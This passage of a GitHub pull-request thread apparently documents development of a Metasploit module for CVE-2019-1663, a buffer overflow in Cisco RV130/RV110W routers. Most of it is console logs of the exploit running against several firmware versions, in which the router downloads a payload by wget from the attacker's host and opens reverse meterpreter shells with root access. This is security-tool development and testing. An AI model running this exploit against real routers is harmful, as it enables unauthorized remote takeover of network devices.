100644/rw-r--r--  2424    fil   2017-03-30 04:24:02 -0500  status_vpn.asp
100644/rw-r--r--  7958    fil   2017-03-30 04:24:02 -0500  status_wide.asp
100644/rw-r--r--  12902   fil   2017-03-30 04:24:02 -0500  status_wireless.asp
100644/rw-r--r--  34291   fil   2017-03-30 04:24:02 -0500  style.css
100644/rw-r--r--  22138   fil   2017-03-30 04:24:02 -0500  system.asp
100644/rw-r--r--  33258   fil   2017-03-30 04:24:02 -0500  time_zone.asp
100644/rw-r--r--  14387   fil   2017-03-30 04:24:02 -0500  tree.asp
100644/rw-r--r--  12706   fil   2017-03-30 04:24:02 -0500  tree_portal.asp
100644/rw-r--r--  13010   fil   2017-03-30 04:24:02 -0500  triggering.asp
100644/rw-r--r--  15319   fil   2017-03-30 04:24:02 -0500  tunneling_6to4.asp
100644/rw-r--r--  28872   fil   2017-03-30 04:24:02 -0500  upgrade.asp
100644/rw-r--r--  3504    fil   2017-03-30 04:24:02 -0500  usb_show.asp
100644/rw-r--r--  17855   fil   2017-03-30 04:24:02 -0500  users.asp
100644/rw-r--r--  12892   fil   2017-03-30 04:24:02 -0500  view_logs.asp
100644/rw-r--r--  17415   fil   2017-03-30 04:24:02 -0500  vlan_membership.asp
100644/rw-r--r--  1269    fil   2017-03-30 04:24:02 -0500  vlan_valid_subnet.js
100644/rw-r--r--  23095   fil   2017-03-30 04:24:02 -0500  vpn_adv.asp
100644/rw-r--r--  10642   fil   2017-03-30 04:24:02 -0500  vpn_basic.asp
100644/rw-r--r--  7461    fil   2017-03-30 04:24:02 -0500  vpn_basic_view.asp
100644/rw-r--r--  24001   fil   2017-03-30 04:24:02 -0500  vpn_client.asp
100644/rw-r--r--  34800   fil   2017-03-30 04:24:02 -0500  wan.asp
100644/rw-r--r--  19857   fil   2017-03-30 04:24:02 -0500  wan_ipv6.asp
100644/rw-r--r--  14344   fil   2017-03-30 04:24:02 -0500  wds.asp
100644/rw-r--r--  24459   fil   2017-03-30 04:24:02 -0500  webfilter.asp
40755/rwxr-xr-x   822     dir   2017-03-30 04:24:02 -0500  wizard
100644/rw-r--r--  431     fil   2017-03-30 04:24:02 -0500  wizard.asp
40755/rwxr-xr-x   221     dir   2017-03-30 04:24:02 -0500  wizard_vpn
100644/rw-r--r--  1108    fil   2017-03-30 04:24:02 -0500  wizard_vpn.asp
100644/rw-r--r--  2445    fil   2017-03-30 04:24:02 -0500  workmode.asp

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >

wvu-r7 commented Apr 12, 2019

I spent a little time yesterday looking for alternative ROP chains. I think the one you've chosen is basically perfect for arbitrary system(3) execution. Excellent work. I'm landing this as it stands.

wvu-r7 merged commit 5e18919 into rapid7:master Apr 12, 2019

3 checks passed:
  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed

wvu-r7 added a commit that referenced this pull request Apr 12, 2019

wvu-r7 commented Apr 12, 2019

Release Notes

The Cisco RV130W RMI RCE module is a stack-based buffer overflow exploit that allows you to target vulnerable Cisco RV130 and RV130W VPN routers.

msjenkins-r7 added a commit that referenced this pull request Apr 12, 2019

wvu-r7 commented Apr 12, 2019

Sorry, I have some quick updates in #11721 I'll land right away.

tdoan-r7 added the rn-modules label Apr 17, 2019

ccondon-r7 commented Jun 20, 2019

Hey @QKaiser, a heads up: We're going to be featuring a deep dive into this exploit in the Q2 edition of Metasploit's development diaries series next week. You'll be acknowledged for the (great) contribution, and we'll post a link here when it's out! For reference, the Q1 development diaries read like this: https://www.rapid7.com/research/report/metasploit-development-diaries-q1-2019/

ccondon-r7 commented Jun 25, 2019

QKaiser commented Jul 18, 2019

Hi there!

I got my module working against all vulnerable firmware versions of Cisco RV110W on a physical device.

What's the best course of action here? Should I create a module per model (one for RV110, one for RV130, one for RV215) or should I keep a single module for this vulnerability (CVE-2019-1663)?

If we keep the same module, it has to be renamed by removing the 'rv130' from it. If we do separate modules there will be a lot of repetition (e.g. the payload construction function is exactly the same for all versions of RV110/RV215 and would therefore be replicated in two different modules).

Demo of working exploits below 🤖

Cisco RV110W (firmware version 1.1.0.9)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check

[+] Successfully identified device: Cisco RV110W 1.1.0.9
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 0
target => 0
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/Oeg2hQAjOd
[*] Client 192.168.1.1 (Wget) requested /Oeg2hQAjOd
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 14 opened (192.168.1.100:4444 -> 192.168.1.1:40785) at 2019-07-18 21:25:56 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 1381 created.
Channel 1 created.
nvram get fw_version
1.1.0.9
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 14 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.0.9)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check

[+] Successfully identified device: Cisco RV110W 1.2.0.9
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 1
target => 1
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/E8DN5bSj5D
[*] Client 192.168.1.1 (Wget) requested /E8DN5bSj5D
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 12 opened (192.168.1.100:4444 -> 192.168.1.1:47864) at 2019-07-18 21:11:05 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 472 created.
Channel 1 created.
nvram get fw_version
1.2.0.9
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.1 - Meterpreter session 12 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.0.10)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check

[+] Successfully identified device: Cisco RV110W 1.2.0.10
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 2
target => 2
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/4VFaoatLb
[*] Client 192.168.1.1 (Wget) requested /4VFaoatLb
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 9 opened (192.168.1.100:4444 -> 192.168.1.1:35866) at 2019-07-18 20:58:33 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 544 created.
Channel 1 created.
nvram get fw_version
1.2.0.10
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.1 - Meterpreter session 9 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.1.4)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check

[+] Successfully identified device: Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 3
target => 3
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/2nlTdxRvlLf
[*] Client 192.168.1.1 (Wget) requested /2nlTdxRvlLf
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 6 opened (192.168.1.100:4444 -> 192.168.1.1:49181) at 2019-07-18 19:26:06 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 520 created.
Channel 1 created.
nvram get fw_version
1.2.1.4
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.1 - Meterpreter session 6 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.1.7)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check

[+] Successfully identified device: Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 4
target => 4
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/9f1U7su
[*] Client 192.168.1.1 (Wget) requested /9f1U7su
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 4 opened (192.168.1.100:4444 -> 192.168.1.1:60217) at 2019-07-18 19:16:04 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 694 created.
Channel 1 created.
nvram get fw_version
1.2.1.7
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.1 - Meterpreter session 4 closed.  Reason: User exit

wvu-r7 commented Jul 18, 2019

@QKaiser: I would rename the module (or not if it's too well-known) and add a target per version. It is helpful to name modules as generically as possible while disambiguating. :)

Unfortunately, deprecation is being refactored in #12027. You may deprecate the existing way if you wish. I can refactor that when #12027 lands.

QKaiser commented Jul 18, 2019

@wvu-r7 I'll rename the module then, didn't know about the deprecation API :)

I won't open the PR right away as I'm still waiting for an RV215 to replace the qemu offsets with the 'right' ones. I'll check how close #12027 is to landing then.
